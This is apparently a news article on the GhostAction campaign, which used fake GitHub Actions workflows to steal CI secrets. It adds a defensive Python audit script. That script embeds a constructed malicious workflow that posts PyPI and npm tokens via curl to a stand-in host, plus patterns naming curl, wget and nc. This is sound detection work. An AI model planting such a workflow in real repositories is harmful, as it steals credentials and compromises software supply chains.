Cyber-Attack Campaign Ghostaction Targets Github Workflows - Arabian Post
Security investigators uncovered a sweeping supply chain campaign, named GhostAction, that compromised 327 GitHub user accounts across 817 repositories on 5 September 2025. Attackers inserted deceptive workflow files, disguised as security enhancements, into projects, including the open-source FastUUID library, extracting and exfiltrating 3,325 secrets such as PyPI, npm and DockerHub tokens to an external server.
The campaign began when GitGuardian noted a suspicious commit on 2 September by the GitHub user Grommash9. The change, titled “Add Github Actions Security workflow”, embedded a workflow that captured PyPI API tokens and sent them to a specified HTTP endpoint. Although the workflow was executed, no malicious package uploads were detected in the FastUUID project during the compromised timeframe. By midday on 5 September, PyPI placed the project into read-only mode, and the malicious commit was promptly reverted.
Further analysis revealed that this tactic was systematic: attackers inspected legitimate CI/CD pipelines within targeted repositories to identify secret names, then crafted tailored malicious workflows to capture credentials on push or manual trigger. In total, more than 3,300 secrets, spanning DockerHub credentials, personal access tokens, npm authentication tokens, PyPI keys, AWS credentials, database logins, and Cloudflare API tokens, were stolen across over eight hundred repositories.
This breach exposed a critical weakness in the current CI/CD security model: the assumption that automated workflows are inherently benign. The GhostAction supply chain campaign underscores how trusted automation can be weaponised to harvest sensitive credentials undetected.
Developers and organisations need to urgently enforce stricter controls over GitHub Actions. Measures such as mandatory code reviews for workflow changes, branch protection rules, automated secret scanning and frequent rotation of credentials are vital to mitigate such threats.
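As an added illustration of the review and scanning controls described above (example code written for this article, not GitGuardian's or GitHub's tooling), the audit below flags a workflow that maps repository secrets into a job, invokes a network tool, and contacts a host outside an allow-list; the two workflow texts and the allow-list are constructed assumptions.

```python
import re

# Constructed sample (not the real GhostAction commit): secrets mapped into env
# and posted to a non-GitHub host, runnable on push or manual dispatch.
SUSPICIOUS_WORKFLOW = """\
name: Add Github Actions Security workflow
on: [push, workflow_dispatch]
jobs:
  scan:
    runs-on: ubuntu-latest
    steps:
      - name: Collect
        env:
          PYPI_API_TOKEN: ${{ secrets.PYPI_API_TOKEN }}
          NPM_TOKEN: ${{ secrets.NPM_TOKEN }}
        run: curl -s -X POST -d "p=$PYPI_API_TOKEN&n=$NPM_TOKEN" https://example.invalid/c
"""

# Constructed benign workflow for comparison.
BENIGN_WORKFLOW = """\
name: CI
on:
  pull_request:
jobs:
  test:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - run: pip install . && pytest
"""

SECRET_REF = re.compile(r"\$\{\{\s*secrets\.(\w+)\s*\}\}")
URL_HOST = re.compile(r"https?://([\w.-]+)")
NET_TOOL = re.compile(r"\b(curl|wget|nc|ncat)\b")
# Hosts a pipeline legitimately talks to; anything else is flagged (assumption).
ALLOWED_HOSTS = {"github.com", "api.github.com", "upload.pypi.org", "registry.npmjs.org"}

def audit_workflow(text):
    """Flag a workflow that reads secrets and ships them to an unknown host."""
    secrets = sorted(set(SECRET_REF.findall(text)))
    unknown_hosts = sorted({h.lower() for h in URL_HOST.findall(text)} - ALLOWED_HOSTS)
    # Grab the top-level 'on:' block (inline list or nested keys) to see what fires the job.
    m = re.search(r"^on:(.*?)(?=^\S|\Z)", text, re.M | re.S)
    triggers = set(re.findall(r"\b(push|workflow_dispatch|pull_request)\b", m.group(1) if m else ""))
    risky = bool(secrets) and bool(NET_TOOL.search(text)) and bool(unknown_hosts)
    return {"secrets": secrets, "unknown_hosts": unknown_hosts,
            "triggers": sorted(triggers), "risky": risky}

if __name__ == "__main__":
    for name, wf in (("suspicious", SUSPICIOUS_WORKFLOW), ("benign", BENIGN_WORKFLOW)):
        print(name, audit_workflow(wf))
```

Run it as a required check on every pull request that touches `.github/workflows/`, so a flagged file blocks the merge until a reviewer has looked at where the secrets go.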